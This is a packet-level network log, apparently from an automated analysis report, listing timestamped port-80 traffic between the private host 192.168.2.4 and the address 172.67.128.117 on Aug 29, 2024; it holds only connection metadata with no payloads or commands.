                                  Aug 29, 2024 23:42:09.178353071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178358078 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178364038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178379059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178383112 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178390980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178402901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178402901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178412914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178416014 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178431034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178438902 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178466082 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178493023 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178495884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178507090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178515911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178539991 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178548098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178558111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178560972 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178564072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178595066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178618908 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178718090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178726912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178736925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178745985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178755045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178761959 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178766012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178776979 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178778887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178803921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178816080 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178930998 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178941965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178951025 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178965092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178975105 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.178976059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178989887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178998947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.178999901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.179025888 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.179038048 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.259290934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259387016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259391069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259397030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259411097 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259457111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259468079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259480953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259485960 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.259519100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259530067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259538889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259579897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259591103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259599924 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259643078 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.259643078 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.259643078 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.259643078 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.259665012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259675026 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.259704113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.259704113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.260296106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.260305882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.260318041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.260343075 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.260375977 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.260381937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.260391951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.260401011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.260411024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.260421991 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.260453939 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.262953997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.262994051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263004065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263010979 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263056040 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263079882 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263083935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263094902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263104916 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263118029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263129950 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263129950 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263149023 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263176918 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263310909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263320923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263331890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263343096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263354063 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263355017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263366938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263377905 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263408899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263437033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263448000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263458014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263468981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263478994 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263482094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263489008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263499975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263500929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263525009 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263547897 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263576031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263586044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263591051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263622046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263633013 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263706923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263717890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263730049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263741016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263751030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263751030 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263762951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263768911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263772964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263784885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263793945 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263796091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263814926 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263824940 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263845921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.263895035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.263936996 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.264029980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.264039040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.264049053 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.264058113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.264066935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.264070034 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.264077902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.264096022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.264097929 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.264106035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.264117002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.264117956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.264127970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.264133930 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.264141083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.264152050 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.264161110 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.264163971 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.264187098 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.264205933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.264436960 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.264447927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.264504910 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.266129017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266146898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266156912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266185999 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.266208887 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.266258001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266268969 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266278028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266287088 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266297102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266302109 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.266311884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.266345024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.266654968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266701937 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.266724110 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266732931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266769886 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.266845942 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266860008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266869068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266880035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266889095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266891003 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.266916990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.266917944 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.266946077 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.266957998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267003059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267014980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267024040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267041922 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267043114 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267055988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267069101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267091036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267102003 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267118931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267131090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267143965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267153025 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267163038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267168045 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267174959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267193079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267205954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267234087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267246008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267255068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267266035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267277002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267277956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267288923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267302036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267330885 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267477036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267488003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267501116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267515898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267518997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267528057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267538071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267539978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267549038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267558098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267565012 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267570019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267580986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267589092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267590046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267601967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.267601967 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267621994 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.267647028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.347863913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.347873926 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.347878933 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.347882032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.347887039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.347892046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.347897053 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.347901106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348093033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348104000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348115921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348172903 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348172903 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348200083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348212004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348222017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348229885 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348233938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348242998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348251104 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348259926 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348284960 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348687887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348737955 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348823071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348834038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348845005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348855972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348865986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348870039 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348879099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348891020 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.348896980 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348912001 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.348934889 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351583958 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351594925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351612091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351622105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351633072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351639032 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351644039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351656914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351665974 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351669073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351686954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351700068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351701021 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351712942 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351723909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351736069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351747990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351749897 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351768017 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351793051 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351821899 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351834059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351844072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351854086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351872921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351906061 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351906061 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.351950884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351962090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351972103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351984024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.351995945 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352008104 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352020979 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352099895 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352112055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352121115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352132082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352145910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352154016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352154016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352158070 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352170944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352181911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352190018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352202892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352205992 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352231026 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352251053 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352356911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352369070 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352379084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352391005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352401972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352401972 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352413893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352425098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352427006 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352448940 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352471113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352513075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352524042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352529049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352534056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352555037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352556944 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352571964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352581978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352583885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352595091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352607012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352606058 CEST4973080192.168.2.4172.67.128.117
